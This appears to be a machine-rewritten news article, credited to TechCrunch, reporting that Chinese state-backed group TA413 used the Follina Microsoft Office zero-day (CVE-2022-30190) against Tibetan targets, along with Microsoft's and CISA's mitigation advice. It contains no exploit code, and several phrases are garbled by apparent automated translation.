China-backed hackers exploit Microsoft’s unpatched zero-day vulnerability

- Advertisement -


China-backed hackers use unpatched Microsoft Office A zero-day vulnerability known as “Follina” that allows malicious code to be remotely executed on Windows systems.

- Advertisement -

High Severity Vulnerability – tracked as CVE-2022-30190 – Used in attacks to execute malicious PowerShell commands using the Microsoft Diagnostic Tool (MSDT) when opening or previewing specially crafted Office documents. Vulnerability affecting 41 Microsoft products, including Windows 11 and Office 365, runs without elevated privileges, bypasses Windows Defender detection, and does not require macro code to be included to execute binaries or scripts.

- Advertisement -

Day Zero can also bypass the Microsoft Protected View feature, an Office tool that warns you about potentially harmful files and documents. Huntress The researchers warned that converting a document to an RTF file could allow attackers to bypass this warning, as well as trigger an exploit with a preview of the downloaded file on hover that does not require any clicks.

Microsoft warned that the vulnerability could allow attackers to install programs, delete data, and create new accounts in the context permitted by user rights.

- Advertisement -

Cybersecurity researchers have watched hackers use the vulnerability to attack Russian and Belarusian users since April, and corporate security company Proofpoint said this week that a Chinese state-sponsored hacking group is using zero-day in attacks targeting the international Tibetan community.

“TA413 CN APT detected [in-the-wild] using Follina zero-day using URLs to deliver ZIP archives containing Word documents that use this method”, Proofpoint said in a tweet.” The campaigns pose as the “Women’s Empowerment Service” of the Central Tibetan Administration and use the tibet-gov.web domain.[.]Appendix.”

Proofpoint told TechCrunch that it had previously observed threat actor TA413, also tracked as “LuckyCat” and “Earth Berberoka”, targeting Tibetan organizations with malicious browser extensions and COVID-19-themed spying campaigns.

Microsoft initially reported the Follina vulnerability on April 12 after Word documents were discovered that posed as Russian media outlets Sputnik offering radio interview recipients abusing the vulnerability. However, the Shadow Chaser Group mad manthe researcher who first reported the zero day said that Microsoft initially flagged the flaw as not a “security issue”. The tech giant later informed the researcher that “the issue has been fixed” but the patch does not appear to be available.

TechCrunch asked Microsoft when the patch would be published, but the company didn’t respond. However, the company released new management which informs administrators that they can block attacks using CVE-2022-30190 by disabling the MSDT URL protocol along with the preview pane in Windows Explorer.

US Cybersecurity and Infrastructure Security Agency (CISA) issued a warning on Tuesday urging users and administrators to read the Microsoft guidance and apply the necessary workarounds.




Credit: techcrunch.com /

- Advertisement -

Stay on top - Get the daily news in your inbox

DMCA / Correction Notice

Recent Articles

Related Stories

Stay on top - Get the daily news in your inbox